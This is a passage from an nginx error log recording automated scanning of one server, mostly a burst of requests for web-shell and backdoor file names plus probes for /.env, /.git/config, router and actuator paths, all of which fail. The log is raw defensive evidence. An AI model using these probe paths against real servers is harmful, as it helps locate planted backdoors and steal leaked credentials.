localhost-nginx-proxy-manager, request: "GET /xx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 "/var/www/html/.well-known/index.html" is not found (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /.well-known/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/wp-admin/js/wp-conflg.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/f5.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /f5.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /doc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/xtride.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /xtride.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/flower2.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /flower2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/f6.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //f6.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/edit.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //edit.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/aa.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //aa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/ext.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /ext.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 "/var/www/html/wp-includes/js/dist/index.html" is not found (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/js/dist/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 "/var/www/html/wp-includes/SimplePie/index.html" is not found (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/SimplePie/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/av.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //av.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/wp-includes/Text/Diff/Engine/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/wp-content/themes/deeto/login.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/deeto/login.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:36 [error] 354#354: *62977 open() "/var/www/html/file48.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /file48.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/wp-admin/css/colors/blue/index.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/blue/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/wen.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wen.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/xxxx.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /xxxx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/class.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //class.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/wp-admin/css/colors/midnight/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/midnight/about.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/gec.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /gec.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/f35.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /f35.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/wp-admin/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/pp.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /pp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/update/f35.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /update/f35.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //lock360.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/galex.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //galex.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:37 [error] 354#354: *62977 open() "/var/www/html/bipas.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /bipas.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/shoyo.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /shoyo.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/blurbs18.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /blurbs18.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/radio.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /radio.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/wp-good.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-good.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/bless14.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /bless14.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/d2.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /d2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/.well-known/gecko-litespeed.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /.well-known/gecko-litespeed.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/wp-admin/maint/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/wp-content/admin.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-content/admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/wp-admin/setup-config.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/setup-config.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/wp-includes/ID3/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/ID3/about.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:38 [error] 354#354: *62977 open() "/var/www/html/.well-known/admin.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /.well-known/admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/wp-includes/customize/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/customize/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/wp-content/plugins/pwnd/as.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/pwnd/as.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /zwso.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/d1.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /d1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/X7x.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /X7x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/class20.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /class20.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /lock360.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/themes.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /themes.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/gifclass4.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /gifclass4.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/wag.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wag.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/xvent.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /xvent.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/wp-aaa.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-aaa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:39 [error] 354#354: *62977 open() "/var/www/html/ut.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /ut.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/class19.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /class19.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/ooo.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /ooo.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/166.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /166.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/bypass.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /bypass.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/plss3.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /plss3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/atomlib.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /atomlib.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/we.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /we.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/t.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /t.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/bp.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /bp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/wp-admin/user/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/user/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /geck.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/wpc.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wpc.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/gecko.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /gecko.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/a.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /a.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/admins.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /admins.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/thai.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /thai.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:40 [error] 354#354: *62977 open() "/var/www/html/fclas.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /fclas.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/a1.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /a1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/class.1.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /class.1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /lala.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/tox.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /tox.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/gg.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /gg.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/aaa.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /aaa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/wp-content/upgrade/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-content/upgrade/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /index/function.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/ee.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /ee.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/alfanew.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /alfanew.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /admin/function.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/assets/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/wp-admin/images/index.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:41 [error] 354#354: *62977 open() "/var/www/html/elaina.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /elaina.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:42 [error] 354#354: *62977 open() "/var/www/html/kr.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /kr.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:42 [error] 354#354: *62977 open() "/var/www/html/aaaa.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /aaaa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:42 [error] 354#354: *62977 open() "/var/www/html/to.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /to.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:42 [error] 354#354: *62977 open() "/var/www/html/class-admin.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /class-admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:42 [error] 354#354: *62977 open() "/var/www/html/nyan.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /nyan.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:21:10 [error] 354#354: *62978 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 05:37:42 [error] 354#354: *62981 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.118.202.126, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.83.208" +2026/01/24 06:07:15 [error] 351#351: *62998 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 06:07:31 [error] 351#351: *63000 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 06:34:31 [error] 353#353: *64491 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 06:54:18 [error] 353#353: *64498 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 06:56:22 [error] 353#353: *64499 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 07:17:45 [error] 354#354: *64519 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/24 07:18:26 [error] 354#354: *64522 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.218, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/24 07:20:15 [error] 351#351: *64524 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.218, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/24 07:24:59 [error] 351#351: *64528 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 07:27:58 [error] 351#351: *64538 open() 